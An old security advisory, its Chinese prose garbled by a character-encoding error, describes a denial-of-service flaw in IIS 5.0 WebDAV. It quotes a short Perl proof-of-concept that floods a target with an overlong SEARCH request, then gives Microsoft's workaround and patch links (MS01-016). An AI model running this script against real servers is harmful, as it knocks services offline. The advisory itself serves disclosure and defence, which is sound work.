ÊÜÓ°ÏìµÄϵͳ: Microsoft IIS 5.0 + Microsoft Windows NT 2000 ÃèÊö: --------------------------------------------------------------------------------
WebDAVÊÇHTTPÐÒéµÄÀ©Õ¹£¬ÔÊÐí´ÓÔ¶³ÌÀ´±àдºÍ¹ÜÀíWebÄÚÈÝ¡£Î¢ÈíIIS 5.0µÄWebDAVÔÚ ´¦ÀíijЩ»ûÐεÄÇëÇóʱ´æÔÚȱÏÝ£¬µ±Ìá½»Ò»¸ö³¬³¤µÄSEARCHÇëÇóʱ¿ÉÒÔʹIIS ·þÎñÖØÆô¡£
<* À´Ô´£º Georgi Guninski £¨guninski@GUNINSKI.COM£© http://www.guninski.com *>
²âÊÔ³ÌÐò£º --------------------------------------------------------------------------------
¾¯ ¸æ
ÒÔϳÌÐò(·½·¨)¿ÉÄÜ´øÓй¥»÷ÐÔ£¬½ö¹©°²È«Ñо¿Óë½Ìѧ֮Óá£Ê¹ÓÃÕß·çÏÕ×Ô¸º£¡
Georgi Guninski £¨guninski@GUNINSKI.COM£©ÌṩÁËÈçϲâÊÔ´úÂ룺 --vv6.pl------------------------------------------------------------- #!/usr/bin/perl use IO::Socket; printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n"; if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow $xml='<?xml version="1.0"?><D:searchrequest xmlns="DAV:"><D:sql>SELECT DAVisplayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n"; $l=length($xml); $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"; syswrite($socket,$req,length($req)); print "."; $socket->read($res,3000); print "r=".$res; close $socket; } do vv(126000,"V"); sleep(1); do vv(126000,"V"); #Try 125000 - 128000 ---------------------------------------------------------------
-------------------------------------------------------------------------------- ½¨Òé:
ÁÙʱ½â¾ö·½·¨£º
΢Èí¸ø³öÒ»¸ö½ûÖ¹WebDAVµÄÁÙʱ½â¾ö°ì·¨£¨http://www.microsoft.com/technet/support/kb.asp?ID=241520£©£º 1¡¢ÏÈÍ£Ö¹IIS·þÎñ¡£¿ÉÒÔÔÚÃüÁîÐÐÏÂÇá°IISRESET /STOP¡±ÃüÁî¡£ 2¡¢½ûÖ¹everyone·ÃÎÊHttpext.dll£º CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone 3¡¢ÔÙÆô¶¯IIS·þÎñ£ºIISRESET /START
³§É̲¹¶¡£º
΢ÈíÒѾΪ´Ë·¢²¼ÁËÒ»¸ö°²È«¹«¸æ(MS-016)£º http://www.microsoft.com/technet/security/bulletin/MS01-016.asp
²¹¶¡³ÌÐò(Ä¿Ç°Ö»ÓÐÓ¢ÎÄ°æ)£º
Microsoft IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564 |